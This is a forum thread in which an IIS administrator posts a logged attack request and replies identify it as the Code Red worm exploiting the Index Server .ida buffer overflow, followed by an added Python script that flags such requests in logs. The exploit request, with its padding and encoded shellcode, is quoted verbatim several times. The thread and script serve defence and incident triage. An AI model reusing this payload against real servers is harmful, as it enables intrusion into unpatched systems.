-
Index Server Attack on IIS
Here is the log from an attack. What can be accomplished by this attack?
/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u531b%u53ff%u0078%u0000%u00=a/
The log produces a 200 response, which means file found. There is no default.ida
on the server; I searched and nothing came up.
An error is produced "FILE. error ..."
Can the attacker gain access this way?
Thanks for any help.
Savage
-
Re: Index Server Attack on IIS
I went to Microsoft's web site. They have a page on securing a web server.
I did the following:
In IIS under the web site I clicked properties and under home directory I
clicked configure. I removed the reference to .ida files.
Then the attack came again. This time the hacker was given a response of
404 "file not found". I got at least 15 attacks from 15 different IP addresses.
This may be a trojan program running on unsuspecting machines. Is there any
way to track down these machines? Or find out who is sending this data?
Thanks
Savage
"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be accomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response, which means file found. There is no default.ida
>on the server; I searched and nothing came up.
>An error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage
-
Re: Index Server Attack on IIS
This may be the "unchecked buffer" hole, being exploited by the Code Red
worm:
http://www.microsoft.com/technet/sec...n/MS01-033.asp
"Savage" <vondras@enteract.com> wrote in message
news:3b575956$1@news.devx.com...
>
> I went to Microsoft's web site. They have a page on securing a web server.
> I did the following:
> In IIS under the web site I clicked properties and under home directory I
> clicked configure. I removed the reference to .ida files.
>
> Then the attack came again. This time the hacker was given a response of
> 404 "file not found". I got at least 15 attacks from 15 different IP addresses.
> This may be a trojan program running on unsuspecting machines. Is there any
> way to track down these machines? Or find out who is sending this data?
> Thanks
> Savage
>
> "Savage" <vondras@enteract.com> wrote:
> >
> >Here is the log from an attack. What can be accomplished by this attack?
>
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
nnnnnnnnnnnnn%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a/
> >
> >The log produces a 200 response, which means file found. There is no default.ida
> >on the server; I searched and nothing came up.
> >An error is produced "FILE. error ..."
> >
> >Can the attacker gain access this way?
> >Thanks for any help.
> >Savage
>
-
Re: Index Server Attack on IIS
Looks like Code Red.
"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be accomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response, which means file found. There is no default.ida
>on the server; I searched and nothing came up.
>An error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage
-
Re: Index Server Attack on IIS
Looks like the famous Code Red worm (Version 1), which will also
affect your server if...
* you installed your WEB Server (Port 80) on a Windows 2000 IIS
* you did not fix the security hole in Index Server (default.ida)
(My logfiles look the same, except for the space after the question mark
...?%20nnn, and my 'n's are in uppercase.)
Your logfiles now may also show requests like
...default.ida?XXXXX...
This is the new version of Code Red (Version 2).
The error messages of Version 1 and 2 are not similar.
Version 1 will raise the 'malformed header' error and
Version 2 the 'file not found' code.
You can find out how to disinfect at the NAV (Norton AntiVirus) homepage.
www.symantec.com/search
regards
Conny
"Savage" <vondras@enteract.com> wrote:
>
>Here is the log from an attack. What can be accomplished by this attack?
>/default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b00%u531b%u53ff%u0078%u0000%u00=a/
>
>The log produces a 200 response, which means file found. There is no default.ida
>on the server; I searched and nothing came up.
>An error is produced "FILE. error ..."
>
>Can the attacker gain access this way?
>Thanks for any help.
>Savage
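Added example, not part of any post in this thread: a log triage script for the pattern discussed above. It reads a W3C extended log, finds .ida requests whose query string starts with a long run of N or X padding, and groups them by source IP with the status codes returned. The field layout, the 64-character threshold, the dates and the documentation-range IP addresses are assumptions made for the sample.

```python
import re
from collections import defaultdict

# Optional leading %20, then one padding letter repeated at least 64 times
# (the threshold is an assumption chosen for this example).
PAD_RE = re.compile(r"^(?:%20)*([NnXx])\1{63,}")
TAIL = "%u9090%u6858%ucbd3%u7801"  # first %u words quoted in the thread

# Constructed sample log; only the request shape comes from the thread.
SAMPLE_LOG = "\n".join([
    "#Version: 1.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    f"2001-07-19 14:02:11 192.0.2.10 GET /default.ida %20{'n' * 224}{TAIL} 200",
    f"2001-07-19 14:09:40 192.0.2.10 GET /default.ida {'N' * 224}{TAIL} 404",
    f"2001-08-05 03:15:02 198.51.100.7 GET /default.ida {'X' * 224}{TAIL} 404",
    "2001-08-05 03:16:30 203.0.113.5 GET /index.htm - 200",
    "2001-08-05 03:17:00 203.0.113.5 GET /search.ida q=news 200",
])

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def classify(rec):
    """Return 'N-padding', 'X-padding', or None for unrelated requests."""
    if not rec.get("cs-uri-stem", "").lower().endswith(".ida"):
        return None
    m = PAD_RE.match(rec.get("cs-uri-query", ""))
    if m is None:
        return None
    return "N-padding" if m.group(1).lower() == "n" else "X-padding"

def summarize(text):
    """Group matching requests by client IP: count, padding variants, statuses."""
    hits = defaultdict(lambda: {"count": 0, "variants": set(), "statuses": set()})
    for rec in parse_w3c(text):
        variant = classify(rec)
        if variant is not None:
            entry = hits[rec["c-ip"]]
            entry["count"] += 1
            entry["variants"].add(variant)
            entry["statuses"].add(rec["sc-status"])
    return dict(hits)

if __name__ == "__main__":
    for ip, info in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, info["count"], sorted(info["variants"]), sorted(info["statuses"]))
```

The status set per IP shows whether a probe arrived while the .ida mapping was still present (200 in the original post) or after it was removed (404).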